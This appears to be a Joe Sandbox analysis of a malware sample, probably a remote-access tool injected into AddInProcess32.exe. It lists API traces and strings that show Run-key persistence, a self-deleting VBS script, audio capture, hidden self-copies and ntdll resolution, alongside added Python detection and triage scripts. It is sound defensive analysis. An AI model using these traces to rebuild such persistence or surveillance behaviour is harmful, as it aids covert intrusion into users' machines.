                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xpF
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750F4,00000003), ref: 004124CF
                                                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                • String ID: (TG$.exe$HSG$WDH$exepath$open$temp_
                                                                                                • API String ID: 2649220323-4116078715
                                                                                                • Opcode ID: 4af9612e6dfe4c22a935919a48fba31c7c6363db64e19c4ac38d9d1038a54d43
                                                                                                • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                                                                • Opcode Fuzzy Hash: 4af9612e6dfe4c22a935919a48fba31c7c6363db64e19c4ac38d9d1038a54d43
                                                                                                • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
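The function above derives its drop path from GetTempPathW and GetTempFileNameW with the prefix `temp_`, appends `.exe` with lstrcatW, launches the result with ShellExecuteW and then waits on the launching process (OpenProcess with SYNCHRONIZE, WaitForSingleObject INFINITE). The naming pattern that falls out of that call sequence is a cheap detection hook. The script below is an added example written for this report, not code from the sample or from Joe Sandbox; the `temp_<hex>.tmp.exe` regex is derived from the GetTempFileName naming convention plus the observed `.exe` suffix, and the pipe-delimited telemetry lines and the file name `temp_1A2B.tmp.exe` are constructed for the demonstration.

```python
import re
from typing import Dict, Iterable, List

# GetTempFileNameW(path, "temp_", 0, buf) produces <path>\temp_<hex>.tmp with
# up to four hex digits; the sample then appends ".exe" with lstrcatW.
# The regex encodes that derived pattern (an assumption from the API trace,
# not a string present in the sample).
TEMP_EXE_RE = re.compile(r"\\temp_[0-9a-f]{1,4}\.tmp\.exe$", re.IGNORECASE)


def is_temp_dropper_image(image_path: str) -> bool:
    """True when an image path matches the GetTempFileName + '.exe' shape."""
    return TEMP_EXE_RE.search(image_path) is not None


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'key=value|key=value' telemetry line."""
    fields: Dict[str, str] = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def find_temp_exe_launches(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return process-creation events (Sysmon EventID 1) whose Image matches."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue
        if is_temp_dropper_image(ev.get("Image", "")):
            hits.append(ev)
    return hits


# Constructed sample telemetry; paths and the temp file name are made up.
SAMPLE_EVENTS = [
    r"EventID=1|Image=C:\Users\user\AppData\Local\Temp\temp_1A2B.tmp.exe|ParentImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
    r"EventID=1|Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe",
    r"EventID=11|Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe|TargetFilename=C:\Users\user\AppData\Local\Temp\temp_1A2B.tmp",
    r"EventID=1|Image=C:\Users\user\AppData\Local\Temp\temp_1A2B.tmp|ParentImage=C:\Windows\explorer.exe",
]

if __name__ == "__main__":
    for ev in find_temp_exe_launches(SAMPLE_EVENTS):
        print(ev["Image"], "<-", ev["ParentImage"])
```

The `.tmp.exe` double extension is the distinguishing feature: GetTempFileName always produces a `.tmp` name, so legitimate installers that use it rarely end up with an executable named this way. Pair the image-path match with the parent process (here the injected AddInProcess32.exe) to cut false positives further.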
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                • API String ID: 738084811-1354618412
                                                                                                • Opcode ID: 1ebe52de8fce74bd771dbbd14165b571df77c24b16b3e8ae8527e3160db55f87
                                                                                                • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                                                                                • Opcode Fuzzy Hash: 1ebe52de8fce74bd771dbbd14165b571df77c24b16b3e8ae8527e3160db55f87
                                                                                                • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                                                                                • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                                                                                • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                                                                                • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                                                                                • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
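The thirteen WriteFile calls above emit, in order, the 44-byte canonical PCM WAV header: `RIFF`, RIFF size, `WAVE`, `fmt `, fmt chunk size, audio format, channels, sample rate, byte rate, block align, bits per sample, `data`, data size. Files recovered from a host where this sample ran (its audio-capture output) can be validated against that layout before being handed to a player or a transcription pipeline. The parser and builder below are an added example written for this report, not code from the sample; the field widths are taken from the WriteFile sizes in the trace, and the consistency rules (byte rate, block align, RIFF size, on-disk payload) are the standard PCM WAV invariants. The 8 kHz mono sample parameters are constructed.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

# Field layout of the 44-byte PCM WAV header, one struct field per WriteFile
# call observed above (4,4,4,4,4,2,2,4,4,2,2,4,4 bytes).
HEADER_FMT = "<4sI4s4sIHHIIHH4sI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 44


@dataclass
class WavParams:
    channels: int
    sample_rate: int
    bits_per_sample: int
    data_size: int          # bytes of PCM payload following the header
    audio_format: int = 1   # 1 = PCM

    @property
    def block_align(self) -> int:
        return self.channels * self.bits_per_sample // 8

    @property
    def byte_rate(self) -> int:
        return self.sample_rate * self.block_align


def build_wav_header(p: WavParams) -> bytes:
    """Emit the header in the same field order as the sampled function."""
    return struct.pack(
        HEADER_FMT,
        b"RIFF", 36 + p.data_size, b"WAVE",
        b"fmt ", 16, p.audio_format, p.channels, p.sample_rate,
        p.byte_rate, p.block_align, p.bits_per_sample,
        b"data", p.data_size,
    )


def parse_wav_header(buf: bytes, file_size: Optional[int] = None) -> Dict:
    """Decode a header and list internal inconsistencies.

    file_size, when given, is the on-disk size of the recovered file. A
    mismatch against data_size usually means the capture stopped before the
    writer patched the size fields (recorders commonly write the header
    first and fix it up on close), so the payload may still be playable."""
    if len(buf) < HEADER_LEN:
        raise ValueError("buffer shorter than a 44-byte WAV header")
    (riff, riff_size, wave, fmt_id, fmt_size, audio_format, channels,
     sample_rate, byte_rate, block_align, bits_per_sample, data_id,
     data_size) = struct.unpack(HEADER_FMT, bytes(buf[:HEADER_LEN]))

    problems: List[str] = []
    if riff != b"RIFF" or wave != b"WAVE":
        problems.append("bad RIFF/WAVE magic")
    if fmt_id != b"fmt " or fmt_size != 16:
        problems.append(f"unexpected fmt chunk ({fmt_id!r}, size {fmt_size})")
    if data_id != b"data":
        problems.append(f"unexpected data chunk id {data_id!r}")
    if audio_format != 1:
        problems.append(f"non-PCM audio_format {audio_format}")
    expected_align = channels * bits_per_sample // 8
    if block_align != expected_align:
        problems.append(f"block_align {block_align} != channels*bits/8 ({expected_align})")
    if byte_rate != sample_rate * block_align:
        problems.append(f"byte_rate {byte_rate} != sample_rate*block_align")
    if riff_size != 36 + data_size:
        problems.append(f"riff_size {riff_size} != 36 + data_size ({data_size})")
    if file_size is not None and data_size != file_size - HEADER_LEN:
        problems.append(f"data_size {data_size} != payload on disk ({file_size - HEADER_LEN})")

    return {
        "audio_format": audio_format, "channels": channels,
        "sample_rate": sample_rate, "bits_per_sample": bits_per_sample,
        "byte_rate": byte_rate, "block_align": block_align,
        "data_size": data_size,
        "duration_s": data_size / byte_rate if byte_rate else None,
        "problems": problems,
    }


if __name__ == "__main__":
    # Constructed example: one second of 8 kHz, 16-bit mono PCM.
    hdr = build_wav_header(WavParams(1, 8000, 16, 16000))
    print(parse_wav_header(hdr, file_size=HEADER_LEN + 16000))
```

When `problems` only reports a payload-size mismatch, the file is worth keeping: rewrite the two size fields from the on-disk length and the recording will usually play. Any other entry means the bytes at offset 0 are not a header this writer produced.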
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752E8,00407709), ref: 004072BF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-4283035339
                                                                                                • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                                                                                • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
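The function above resolves six ntdll exports by name at runtime (RtlInitUnicodeString, NtAllocateVirtualMemory, NtFreeVirtualMemory, RtlAcquirePebLock, RtlReleasePebLock, LdrEnumerateLoadedModules) so that none of them shows up in the import table. The names still have to exist as strings in the image, and they sit next to each other because one routine references them in sequence; that adjacency is what a memory-dump triage check can key on. The scanner below is an added example written for this report, not code from the sample or from Joe Sandbox. It assumes the export names are stored ANSI (GetProcAddress takes ANSI names) and the module name wide (GetModuleHandleW); the 512-byte cluster window and the sample dump bytes are constructed. Whether this particular set indicates loader-list manipulation is an inference and not something the report states.

```python
from typing import Dict, List

# Export names resolved by the function in the trace, and the module name
# that GetModuleHandleW receives as a wide string.
RESOLVED_NAMES = [
    "RtlInitUnicodeString", "NtAllocateVirtualMemory", "NtFreeVirtualMemory",
    "RtlAcquirePebLock", "RtlReleasePebLock", "LdrEnumerateLoadedModules",
]
MODULE_NAME = "ntdll.dll"


def find_strings(blob: bytes, name: str) -> List[int]:
    """Offsets of every ASCII and UTF-16LE occurrence of name in blob."""
    hits = []
    for needle in (name.encode("ascii"), name.encode("utf-16-le")):
        start = 0
        while (idx := blob.find(needle, start)) != -1:
            hits.append(idx)
            start = idx + 1
    return sorted(hits)


def scan_resolver_strings(blob: bytes, window: int = 512) -> Dict:
    """Report which resolver names are present and whether all of them fall
    inside one window, as they do when a single routine emits them into .rdata."""
    found = {n: find_strings(blob, n) for n in RESOLVED_NAMES}
    present = [n for n, offs in found.items() if offs]

    events = sorted((off, n) for n, offs in found.items() for off in offs)
    need = set(RESOLVED_NAMES)
    clustered = False
    for i, (start, _) in enumerate(events):
        in_window = {n for off, n in events[i:] if off - start <= window}
        if need <= in_window:
            clustered = True
            break

    return {
        "found": found,
        "present": present,
        "module_offsets": find_strings(blob, MODULE_NAME),
        "clustered": clustered,
    }


# Constructed stand-in for a process memory dump (not the report's .sdmp):
# the six names stored back to back, the module name wide, plus filler.
SAMPLE_DUMP = (
    b"\x00" * 64
    + MODULE_NAME.encode("utf-16-le") + b"\x00\x00"
    + b"\x00".join(n.encode("ascii") for n in RESOLVED_NAMES) + b"\x00"
    + b"\x00" * 64
    + b"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe\x00"
)

if __name__ == "__main__":
    result = scan_resolver_strings(SAMPLE_DUMP)
    print(result["present"], "clustered:", result["clustered"])
```

Run it over the 0x400000 region dumped from the injected AddInProcess32.exe rather than over the on-disk VBS or the PowerShell stage, which carry the payload only in encoded form. A hit on `NtAllocateVirtualMemory` alone is noise; the full cluster is what distinguishes this resolver stub from ordinary runtime linking.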
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750F4,0000000E), ref: 0040D068
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open$RG$RG
                                                                                                • API String ID: 1579085052-2529979590
                                                                                                • Opcode ID: 64acb6d32da23e36a4ac8d6ed565a0560cad41de601bfdc8fc88007b96f058bf
                                                                                                • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                                                                                • Opcode Fuzzy Hash: 64acb6d32da23e36a4ac8d6ed565a0560cad41de601bfdc8fc88007b96f058bf
                                                                                                • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
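The install routine above creates a directory, copies the host image (`C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe`, the process the payload was injected into) into it, sets attributes 0x7 on the copy (FILE_ATTRIBUTE_READONLY | HIDDEN | SYSTEM), launches it with ShellExecuteW `open` and exits. A copy of a Microsoft .NET helper binary sitting outside the Framework directories with hidden and system attributes is therefore a concrete thing to hunt for. The triage function below is an added example written for this report, not code from the sample; the "legitimate" directory prefixes and the file listing are assumptions constructed for the demonstration, and the attribute bit values are the documented FILE_ATTRIBUTE_* constants.

```python
from typing import Dict, Iterable, List

# Documented FILE_ATTRIBUTE_* bits; SetFileAttributesW(..., 0x7) in the
# trace sets the first three in one call.
FILE_ATTRIBUTES = {
    0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM",
    0x10: "DIRECTORY", 0x20: "ARCHIVE",
}
READONLY_HIDDEN_SYSTEM = 0x07

# Host image name from the trace, and (assumption) the only places where a
# genuine copy of it is expected.
HOST_IMAGE = "addinprocess32.exe"
LEGIT_PREFIXES = (
    "c:\\windows\\microsoft.net\\framework\\",
    "c:\\windows\\microsoft.net\\framework64\\",
)


def decode_attributes(mask: int) -> List[str]:
    """Names of the attribute bits set in mask, lowest bit first."""
    return [name for bit, name in sorted(FILE_ATTRIBUTES.items()) if mask & bit]


def triage_file(path: str, attributes: int) -> List[str]:
    """Reasons a single file record looks like the install step above."""
    reasons = []
    low = path.lower()
    name = low.rsplit("\\", 1)[-1]
    if name == HOST_IMAGE and not low.startswith(LEGIT_PREFIXES):
        reasons.append("AddInProcess32.exe outside the .NET Framework directories")
    if ((attributes & READONLY_HIDDEN_SYSTEM) == READONLY_HIDDEN_SYSTEM
            and low.endswith(".exe") and not low.startswith("c:\\windows\\")):
        reasons.append("executable marked READONLY|HIDDEN|SYSTEM outside C:\\Windows")
    return reasons


def triage_listing(records: Iterable[Dict]) -> List[Dict]:
    """Apply triage_file to {path, attributes} records and keep the hits."""
    flagged = []
    for rec in records:
        reasons = triage_file(rec["path"], rec["attributes"])
        if reasons:
            flagged.append({
                **rec,
                "attributes_decoded": decode_attributes(rec["attributes"]),
                "reasons": reasons,
            })
    return flagged


# Constructed listing: the genuine binary, a planted copy, and an unrelated file.
SAMPLE_LISTING = [
    {"path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe", "attributes": 0x20},
    {"path": "C:\\Users\\user\\AppData\\Roaming\\example\\AddInProcess32.exe", "attributes": 0x07},
    {"path": "C:\\Users\\user\\Documents\\report.docx", "attributes": 0x20},
]

if __name__ == "__main__":
    for hit in triage_listing(SAMPLE_LISTING):
        print(hit["path"], hit["attributes_decoded"], hit["reasons"])
```

On a live Windows host the records come from `os.stat(path).st_file_attributes` or from a forensic file-system listing; the two rules are independent so a renamed copy still trips the attribute rule and a copy left with default attributes still trips the path rule.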
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
                                                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
                                                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                • Opcode Fuzzy Hash: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
                                                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                • API String ID: 2490988753-744132762
                                                                                                • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                                                                                • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
